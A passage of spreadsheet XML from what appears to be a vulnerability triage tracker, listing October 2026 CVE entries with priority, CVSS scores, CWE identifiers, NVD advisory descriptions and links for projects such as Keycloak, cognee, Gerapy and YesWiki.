      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Dynamic Client Registration flow of the Keycloak identity and access management server. The issue occurs because the registration process fails to filter security-sensitive client attributes when a new client is created. An attacker with a valid Initial Access Token can register a client that bypasses audience checks during token introspection. This allows the attacker to view sensitive identity information, roles, and session details from access tokens belonging to other applications in the same realm.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105306</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105141</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in topoteretes cognee up to 1.5.4. The affected element is the function get_user_id_by_email of the file cognee/modules/users/authentication/get_api_auth_backend.py of the component JWT Signing Key Handler. The manipulation of the argument FASTAPI_USERS_JWT_SECRET results in hard-coded credentials. The attack may be launched remotely. Upgrading to version 1.6.0 is sufficient to fix this issue. The patch is identified as fa65fc0cd86cdba48d19aa76e36be862be982f5d. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105141</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105165</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-275, CWE-732</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in devopspolis secrets-replicator up to 0.4.0. Impacted is the function process_single_secret of the file src/handler.py of the component AssumeRole Handler. Such manipulation of the argument external_id leads to incorrect permission assignment. The attack can be executed remotely. Upgrading to version 0.5.0 is recommended to address this issue. The name of the patch is b42239405fbf4fae3c3f0048fc0b4225112edceb. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105165</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105168</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This affects an unknown function of the file admin/admin.php of the component Order Assignment Block. The manipulation of the argument order_id/delivery_person_id leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105168</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105171</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. Affected by this vulnerability is an unknown functionality of the file admin/admin.php of the component Role Attribute Handler. Such manipulation of the argument Name leads to authorization bypass. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105171</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105180</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>6.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-913, CWE-915</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Jeebase 0.0.1. This vulnerability affects the function updateUser of the file /user/update/info of the component UserService. Executing a manipulation of the argument user/tempUser can lead to dynamically-determined object attributes. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105180</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105181</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>6.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in itsourcecode Online Admission System 1.0. This issue affects some unknown processing of the file register1.php. The manipulation of the argument fname leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105181</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105186</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>6.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Online Admission System 1.0. This impacts an unknown function of the file /new.php. Executing a manipulation of the argument schedid can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105186</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105187</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>6.3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2026-10-05</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Online Admission System 1.0. Affected is an unknown function of the file /admin/key.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105187</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105233</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>6.3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2026-10-05</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This affects an unknown function of the file login.php of the component Login Flow. Such manipulation of the argument PHPSESSID leads to session fixiation. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105233</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105292</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>Chaterm before 0.12.1 contains a login cross-site request forgery vulnerability that allows remote attackers to inject login state by sending chaterm:// callbacks without OAuth state validation. Attackers can trigger a crafted callback with attacker-controlled userInfo from a web page, signing the victim into the attacker's account so default data sync uploads saved hosts, passwords, and private keys.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105292</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105302</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the User Session Note mapper of the Keycloak identity and access management solution. The issue occurs because the mapper does not validate whether a requested session note contains sensitive internal credentials, such as federated access tokens from external identity providers. This allows a delegated client administrator to leak a user's upstream bearer tokens into the tokens issued to their managed application, potentially leading to unauthorized access to the user's data on external platforms.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105302</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105174</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function project_create of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument project_name leads to path traversal. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The identifier of the patch is 6e481078cfba6388a67ca2d9792288405019ba3e. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105174</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105224</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>YesWiki before 4.6.7 contains a cross-site scripting vulnerability in the Bazar valeur action that allows page editors to inject script by rendering unescaped HTML fetched from a remote URL. Attackers can point tools/bazar/actions/valeur.php at a controlled server returning BAZ_fiche_titre markup with an img onerror handler, executing script in every viewer's browser.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105224</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105144</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Drogon up to 1.9.13-1/10.0-beta.3 on Windows. Affected is the function StaticFileRouter::route of the file lib/src/StaticFileRouter.cc of the component Static File Router. Executing a manipulation can lead to path traversal. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105144</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105145</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Weaviate Verba up to 2.1.3. Affected by this vulnerability is the function get_environment of the file goldenverba/components/util.py of the component generate_stream Endpoint. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105145</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105161</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in invariant-systems-ai aiir up to 1.7.0. The affected element is an unknown function of the component Policy Gate Handler. Executing a manipulation can lead to improper verification of cryptographic signature. The attack can be executed remotely. It is advisable to upgrade the affected component. The GitHub repository of this project is not available anymore. This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105161</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105163</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-367</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
